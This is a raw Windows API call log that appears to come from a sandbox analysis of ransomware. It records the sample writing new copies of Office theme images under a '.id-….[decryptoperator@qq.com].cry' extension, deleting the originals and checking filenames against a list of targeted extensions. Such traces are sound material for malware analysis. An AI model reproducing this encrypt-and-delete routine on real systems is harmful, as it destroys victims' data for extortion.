1 [0045.003] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0045.003] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0045.003] GetFileSizeEx (in: hFile=0x1c0, lpFileSize=0x2edff1c | out: lpFileSize=0x2edff1c*=1347) returned 1 [0045.003] CloseHandle (hObject=0x1c0) returned 1 [0045.004] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\preview.gif")) returned 0x20 [0045.004] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\preview.gif.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0045.004] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0045.004] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0045.004] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0045.004] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\preview.gif.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0045.586] GetLastError () returned 0x0 [0045.586] ReadFile (in: hFile=0x1c0, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x543, lpOverlapped=0x0) returned 1 [0045.604] WriteFile (in: hFile=0x200, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0x550, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0x550, lpOverlapped=0x0) returned 1 [0045.605] ReadFile (in: hFile=0x1c0, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x0, lpOverlapped=0x0) returned 1 [0045.605] WriteFile (in: hFile=0x200, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xea, lpOverlapped=0x0) returned 1 [0045.606] SetEndOfFile (hFile=0x200) returned 1 [0045.606] CloseHandle (hObject=0x200) returned 1 [0045.606] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0045.606] SetEndOfFile (hFile=0x1c0) returned 1 [0045.607] CloseHandle (hObject=0x1c0) returned 1 [0045.607] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0045.607] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\preview.gif")) returned 1 [0045.607] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF") returned 72 [0045.607] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF") returned 72 [0045.607] lstrlenW (lpString=".doc") returned 4 [0045.607] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0045.607] lstrlenW (lpString=".docx") returned 5 [0045.607] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0045.607] lstrlenW (lpString=".pdf") returned 4 [0045.607] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0045.607] lstrlenW (lpString=".xls") returned 4 [0045.607] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0045.607] lstrlenW (lpString=".xlsx") returned 5 [0045.607] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0045.607] lstrlenW (lpString=".ppt") returned 4 [0045.607] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0045.607] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF") returned 72 [0045.607] lstrlenW (lpString=".zip") returned 4 [0045.607] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0045.607] lstrlenW (lpString=".rar") returned 4 [0045.608] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0045.608] lstrlenW (lpString=".bz2") returned 4 [0045.608] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0045.608] lstrlenW (lpString=".7z") returned 3 [0045.608] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0045.608] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF") returned 72 [0045.608] lstrlenW (lpString=".dbf") returned 4 [0045.608] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0045.608] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF") returned 72 [0045.608] lstrlenW (lpString=".1cd") returned 4 [0045.608] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0045.608] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF") returned 72 [0045.608] lstrlenW (lpString=".jpg") returned 4 [0045.608] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0045.608] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF") returned 72 [0045.608] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF") returned 72 [0045.608] lstrlenW (lpString=".doc") returned 4 [0045.608] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0045.608] lstrlenW (lpString=".docx") returned 5 [0045.608] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0045.608] lstrlenW (lpString=".pdf") returned 4 [0045.608] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0045.608] lstrlenW (lpString=".xls") returned 4 [0045.608] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0045.608] lstrlenW (lpString=".xlsx") returned 5 [0045.608] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0045.608] lstrlenW (lpString=".ppt") returned 4 [0045.608] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0045.608] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF") returned 72 [0045.608] lstrlenW (lpString=".zip") returned 4 [0045.608] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0045.608] lstrlenW (lpString=".rar") returned 4 [0045.608] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0045.608] lstrlenW (lpString=".bz2") returned 4 [0045.608] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0045.609] lstrlenW (lpString=".7z") returned 3 [0045.609] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0045.609] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF") returned 72 [0045.609] lstrlenW (lpString=".dbf") returned 4 [0045.609] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0045.609] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF") returned 72 [0045.609] lstrlenW (lpString=".1cd") returned 4 [0045.609] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0045.609] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF") returned 72 [0045.609] lstrlenW (lpString=".jpg") returned 4 [0045.609] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0045.609] lstrcmpiW (lpString1=".PNG", lpString2=".cry") returned 1 [0045.609] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0045.609] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0045.609] GetFileSizeEx (in: hFile=0x1c0, lpFileSize=0x2edff1c | out: lpFileSize=0x2edff1c*=48115) returned 1 [0045.609] CloseHandle (hObject=0x1c0) returned 1 [0045.609] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\thmbnail.png")) returned 0x20 [0045.609] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\thmbnail.png.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0045.609] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0045.610] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0045.610] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0045.610] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\thmbnail.png.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0045.610] GetLastError () returned 0x0 [0045.610] ReadFile (in: hFile=0x1c0, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0xbbf3, lpOverlapped=0x0) returned 1 [0045.632] WriteFile (in: hFile=0x200, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xbc00, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xbc00, lpOverlapped=0x0) returned 1 [0045.633] ReadFile (in: hFile=0x1c0, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x0, lpOverlapped=0x0) returned 1 [0045.634] WriteFile (in: hFile=0x200, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xec, lpOverlapped=0x0) returned 1 [0045.634] SetEndOfFile (hFile=0x200) returned 1 [0045.634] CloseHandle (hObject=0x200) returned 1 [0045.634] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0045.634] SetEndOfFile (hFile=0x1c0) returned 1 [0045.635] CloseHandle (hObject=0x1c0) returned 1 [0045.635] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0045.635] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\thmbnail.png")) returned 1 [0045.635] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG") returned 74 [0045.635] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG") returned 74 [0045.635] lstrlenW (lpString=".doc") returned 4 [0045.635] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0045.635] lstrlenW (lpString=".docx") returned 5 [0045.635] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0045.635] lstrlenW (lpString=".pdf") returned 4 [0045.635] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0045.635] lstrlenW (lpString=".xls") returned 4 [0045.636] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0045.636] lstrlenW (lpString=".xlsx") returned 5 [0045.636] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0045.636] lstrlenW (lpString=".ppt") returned 4 [0045.636] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0045.636] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG") returned 74 [0045.636] lstrlenW (lpString=".zip") returned 4 [0045.636] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0045.636] lstrlenW (lpString=".rar") returned 4 [0045.636] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0045.636] lstrlenW (lpString=".bz2") returned 4 [0045.636] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0045.636] lstrlenW (lpString=".7z") returned 3 [0045.636] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0045.636] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG") returned 74 [0045.636] lstrlenW (lpString=".dbf") returned 4 [0045.636] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0045.636] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG") returned 74 [0045.636] lstrlenW (lpString=".1cd") returned 4 [0045.636] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0045.636] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG") returned 74 [0045.636] lstrlenW (lpString=".jpg") returned 4 [0045.636] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0045.636] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG") returned 74 [0045.636] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG") returned 74 [0045.636] lstrlenW (lpString=".doc") returned 4 [0045.636] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0045.636] lstrlenW (lpString=".docx") returned 5 [0045.636] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0045.636] lstrlenW (lpString=".pdf") returned 4 [0045.636] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0045.636] lstrlenW (lpString=".xls") returned 4 [0045.636] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0045.636] lstrlenW (lpString=".xlsx") returned 5 [0045.636] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0045.636] lstrlenW (lpString=".ppt") returned 4 [0045.636] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0045.637] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG") returned 74 [0045.637] lstrlenW (lpString=".zip") returned 4 [0045.637] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0045.637] lstrlenW (lpString=".rar") returned 4 [0045.637] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0045.637] lstrlenW (lpString=".bz2") returned 4 [0045.637] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0045.637] lstrlenW (lpString=".7z") returned 3 [0045.637] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0045.637] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG") returned 74 [0045.637] lstrlenW (lpString=".dbf") returned 4 [0045.637] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0045.637] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG") returned 74 [0045.637] lstrlenW (lpString=".1cd") returned 4 [0045.637] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0045.637] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG") returned 74 [0045.637] lstrlenW (lpString=".jpg") returned 4 [0045.637] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0045.637] lstrcmpiW (lpString1=".PNG", lpString2=".cry") returned 1 [0045.637] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0045.637] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0045.676] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2edff1c | out: lpFileSize=0x2edff1c*=37440) returned 1 [0045.677] CloseHandle (hObject=0x164) returned 1 [0045.677] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\thmbnail.png")) returned 0x20 [0045.677] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\thmbnail.png.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0045.677] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0045.677] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0045.677] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0045.677] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\thmbnail.png.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0045.677] GetLastError () returned 0x0 [0045.677] ReadFile (in: hFile=0x164, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x9240, lpOverlapped=0x0) returned 1 [0045.722] WriteFile (in: hFile=0x208, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0x9250, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0x9250, lpOverlapped=0x0) returned 1 [0045.723] ReadFile (in: hFile=0x164, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x0, lpOverlapped=0x0) returned 1 [0045.723] WriteFile (in: hFile=0x208, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xec, lpOverlapped=0x0) returned 1 [0045.723] SetEndOfFile (hFile=0x208) returned 1 [0045.723] CloseHandle (hObject=0x208) returned 1 [0045.723] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0045.723] SetEndOfFile (hFile=0x164) returned 1 [0045.724] CloseHandle (hObject=0x164) returned 1 [0045.724] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0045.725] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\thmbnail.png")) returned 1 [0045.725] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG") returned 76 [0045.725] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG") returned 76 [0045.725] lstrlenW (lpString=".doc") returned 4 [0045.725] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0045.725] lstrlenW (lpString=".docx") returned 5 [0045.725] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0045.725] lstrlenW (lpString=".pdf") returned 4 [0045.725] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0045.725] lstrlenW (lpString=".xls") returned 4 [0045.725] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0045.725] lstrlenW (lpString=".xlsx") returned 5 [0045.725] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0045.725] lstrlenW (lpString=".ppt") returned 4 [0045.725] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0045.725] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG") returned 76 [0045.725] lstrlenW (lpString=".zip") returned 4 [0045.725] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0045.725] lstrlenW (lpString=".rar") returned 4 [0045.725] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0045.725] lstrlenW (lpString=".bz2") returned 4 [0045.725] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0045.725] lstrlenW (lpString=".7z") returned 3 [0045.725] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0045.725] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG") returned 76 [0045.725] lstrlenW (lpString=".dbf") returned 4 [0045.725] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0045.725] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG") returned 76 [0045.725] lstrlenW (lpString=".1cd") returned 4 [0045.725] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0045.725] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG") returned 76 [0045.725] lstrlenW (lpString=".jpg") returned 4 [0045.726] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0045.726] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG") returned 76 [0045.726] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG") returned 76 [0045.726] lstrlenW (lpString=".doc") returned 4 [0045.726] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0045.726] lstrlenW (lpString=".docx") returned 5 [0045.726] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0045.726] lstrlenW (lpString=".pdf") returned 4 [0045.726] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0045.726] lstrlenW (lpString=".xls") returned 4 [0045.726] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0045.726] lstrlenW (lpString=".xlsx") returned 5 [0045.726] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0045.726] lstrlenW (lpString=".ppt") returned 4 [0045.726] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0045.726] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG") returned 76 [0045.726] lstrlenW (lpString=".zip") returned 4 [0045.726] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0045.726] lstrlenW (lpString=".rar") returned 4 [0045.726] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0045.726] lstrlenW (lpString=".bz2") returned 4 [0045.726] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0045.726] lstrlenW (lpString=".7z") returned 3 [0045.726] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0045.726] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG") returned 76 [0045.726] lstrlenW (lpString=".dbf") returned 4 [0045.726] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0045.726] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG") returned 76 [0045.726] lstrlenW (lpString=".1cd") returned 4 [0045.726] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0045.726] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG") returned 76 [0045.726] lstrlenW (lpString=".jpg") returned 4 [0045.726] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0045.727] 